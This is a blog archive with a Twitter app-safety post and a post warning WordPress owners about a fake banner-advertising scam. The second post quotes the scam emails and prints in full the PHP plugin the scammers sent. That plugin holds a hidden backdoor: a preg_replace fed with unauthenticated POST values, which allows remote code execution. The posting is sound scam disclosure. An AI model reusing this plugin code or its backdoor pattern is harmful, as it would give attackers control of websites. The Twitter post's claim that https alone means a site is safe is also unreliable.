Category Archives: Scam

Scam, Security, Twitter

Staying Safe on Twitter

There are many sites that would love to steal your Twitter password. Here’s a way to make sure they don’t.

1. Have your browser remember your password – When you sign-in to Twitter, check the remember me box which permits your browser to save your password in its cache. Do this ONLY if you are on your own computer, right? Don’t do this on a shared computer.

2. Only allow apps that you trust: Once you are signed in, a proper Twitter app will be able to access your credentials through Twitter. Every app that is authorized by Twitter will be able to access your details if you are already using Twitter when you try to add the app. Makes sense, right?

3. Don’t re-enter your password – Any app that is authorized by Twitter does not require your password. You’re already logged into Twitter and the apps, if they are authorized by Twitter, can access your info every easily. Once you click the ALLOW button, the app takes over and does its stuff and you can use it. Easy as pie. If an app asks for your password, then it’s trying to steal your account or hijack it. Once you type in your password the app will use your account to send out tweets and DMs to all of your followers. These tweets and DMs will all contain a link that will try to steal their passwords too. See how it goes?

How to Safely Add a Twitter App

Let’s add an app, just to show you what you’re looking for. I’ll use Tweeter Karma as an example. I like to know who’s following me and whether I am following them or not. Twitter Karma gives me all the details on that. Head over to http://dossy.org/twitter/karma/  This is what you’ll see:

Twitter Karma Site
Look for the 'Sign in with Twitter' button and the official Twitter logo.

 

Once you click the ‘Sign in with Twitter’ button, you’ll see this come up:

The Official Twitter Access Authorization
This is what you see on an official Twitter app site. Note that your password isn't needed.

 

Just to be safe, look for this in your url window:

Twitter URL in URL Window
Make sure the Twitter address is in the url, not a fake 'twitter-ish' url.

 

The site is ‘twitter.com’, the real Twitter URL. The https is a nice touch, too. That means the site is secure.

After you’ve clicked your way through these windows, you’ll see something like this:

Successful Log In Menu
Now you're logged in, all without giving up your password.

 

If you follow these steps when adding a Twitter app, you’ll be safe. Look for improper urls, password requests, etc. If the app looks suspicious, it probably is. Twitter is just fine by itself, the apps are fun but not totally necessary. Hopefully with this blog post, you’ll manage to stay safe out there!

Thanks for reading.

Internet, Scam, Security

WordPress Scam

3 Comments

There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment, details may change somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
4. Finally, I get this email, complete with a password:

Hi!

 

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

 

login: my other site

password: email me for password

 

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web- address

(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

 

What way of payment is suitable for you?

 

Best regards,

Mathis Gaillard.

site: www.izidaagency.com

e-mail: mgaillard@izidaagency.com

phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a php script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';}?>

_____________________________________________________________________________

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

 

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!